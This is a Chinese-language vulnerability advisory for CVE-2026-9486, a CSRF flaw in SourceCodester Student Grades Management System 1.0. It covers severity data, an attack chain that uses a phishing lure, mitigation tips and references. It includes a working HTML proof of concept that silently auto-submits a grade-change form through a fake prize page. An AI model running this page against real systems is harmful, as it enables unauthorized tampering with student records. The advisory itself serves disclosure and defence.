CVE-2026-9486 SourceCodester学生成绩管理系统CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-9486

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Student Grades Management System

漏洞概述

SourceCodester Student Grades Management System 1.0存在跨站请求伪造（CSRF）漏洞。由于缺乏有效的请求验证机制，攻击者可诱导已登录用户访问恶意页面，从而在用户不知情的情况下以用户身份执行非授权操作。该漏洞利用难度低，已公开利用代码，可能导致数据完整性受损。

技术细节

该漏洞的核心在于应用程序对关键状态改变操作的请求来源未进行充分验证。攻击者可以构建一个恶意的HTML页面，其中包含针对目标系统特定功能（如修改学生成绩、删除记录）的HTTP POST请求。当合法用户（如管理员）在保持登录状态的情况下访问此恶意页面时，浏览器会自动携带用户的Session Cookie发送请求。由于服务器端仅凭Cookie确认身份，未校验CSRF Token或Referer头，导致服务器误认为请求是用户主动发起的，进而执行恶意操作。根据CVSS向量分析，该漏洞攻击复杂度低，无需特权，但需要用户交互，主要影响数据的完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统为SourceCodester Student Grades Management System 1.0，并确认其存在CSRF漏洞。

STEP 2

2. 载荷构造

攻击者编写包含恶意HTTP请求的HTML/JavaScript代码，指向目标系统的敏感功能接口（如修改成绩）。

STEP 3

3. 社会工程学投递

攻击者通过电子邮件或即时通讯工具，诱导已登录的管理员用户点击指向恶意页面的链接。

STEP 4

4. 请求执行

管理员访问恶意页面后，浏览器在后台自动携带有效的Session Cookie向目标服务器发送请求。

STEP 5

5. 达成目的

目标服务器验证Cookie有效，误认为是管理员操作，执行了数据修改等操作，导致完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-9486: CSRF in SourceCodester Student Grades Management System 1.0
Description: This HTML page demonstrates how an attacker could craft a malicious form to perform an action on behalf of an authenticated administrator.
Usage: Host this file on a server and trick the admin into visiting the URL.
-->
<html>
  <body>
    <h1>Congratulations! You won a prize.</h1>
    <p>Click the button below to claim it.</p>
    <!-- The form submits silently via JavaScript or on click -->
    <form action="http://target-site/student-grades-management-system/update_grade_endpoint" method="POST" id="csrf-form">
      <input type="hidden" name="student_id" value="1" />
      <input type="hidden" name="grade" value="A+" /> <!-- Malicious payload -->
      <input type="hidden" name="submit" value="Update" />
    </form>
    <script>
      // Auto-submit to simulate interaction-less attack if UI interaction is not strictly required by the user's browser settings,
      // though the CVE vector specifies UI:R (User Interaction Required).
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>

影响范围

SourceCodester Student Grades Management System 1.0

防御指南

临时缓解措施

建议管理员在完成系统操作后立即登出，不要在登录状态下浏览来源不明的网页或点击陌生链接。在厂商发布补丁前，可考虑通过部署WAF规则来拦截异常的Referer请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9486
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9486
3 Details https://www.cvedetails.com/cve/CVE-2026-9486/
4 VulDB https://vuldb.com/cve/CVE-2026-9486
5 Link https://github.com/Jack-MRJ/Student-Grades-Management-System-Vulnerability-Report
6 Link https://vuldb.com/submit/814044
7 Link https://vuldb.com/vuln/365467
8 Link https://vuldb.com/vuln/365467/cti
9 Link https://www.sourcecodester.com/